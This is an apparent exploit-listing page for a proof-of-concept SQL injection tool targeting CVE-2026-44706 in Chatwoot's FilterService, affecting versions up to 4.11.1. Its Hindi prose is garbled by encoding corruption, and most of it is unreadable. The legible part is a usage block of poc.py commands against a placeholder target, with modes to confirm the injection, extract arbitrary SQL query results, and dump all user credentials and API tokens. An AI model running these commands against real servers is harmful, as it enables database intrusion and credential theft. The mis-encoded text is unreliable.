## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HAKAIOFFSEC-CVE-2026-44706
# Chatwoot FilterService рдореЗрдВ SQL Injection
CVE-2026-44706 рдХреЗ рд▓рд┐рдП рдПрдХ рдкреНрд░реВрдл-рдСрдл-рдХреЙрдиреНрд╕реЗрдкреНрдЯ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ, Chatwoot рдХреЗ `FilterService#lt_gt_filter_values` рдореЗрдВ SQL рдЗрдВрдЬреЗрдХреНрд╢рди рднреЗрджреНрдпрддрд╛, рдЬреЛ рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрд┐рдд рдПрдЬреЗрдВрдЯ рдХреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдФрд░ API рдЯреЛрдХрди рд╕рд╣рд┐рдд рдкреВрд░реЗ PostgreSQL рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдкрдврд╝рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред рдкреВрд░рд╛ рд▓реЗрдЦ рдпрд╣рд╛рдБ рдкрдврд╝реЗрдВред
рдЙрдкрдпреЛрдЧ:
root@kitploit:~
# рдЗрдВрдЬреЗрдХреНрд╢рди рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░реЗрдВ (рдмреВрд▓рд┐рдпрди-рдЖрдзрд╛рд░рд┐рдд)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# рд╕рдордп-рдЖрдзрд╛рд░рд┐рдд рдкреБрд╖реНрдЯрд┐
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# рдордирдорд╛рдирд╛ SQL рдХреНрд╡реЗрд░реА рдкрд░рд┐рдгрд╛рдо рдирд┐рдХрд╛рд▓реЗрдВ
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдФрд░ API рдЯреЛрдХрди рдбрдВрдк рдХрд░реЗрдВ
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
## рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╕рдВрд╕реНрдХрд░рдг
* Chatwoot тЙд 4.11.1
## рдореВрд▓ рдХрд╛рд░рдг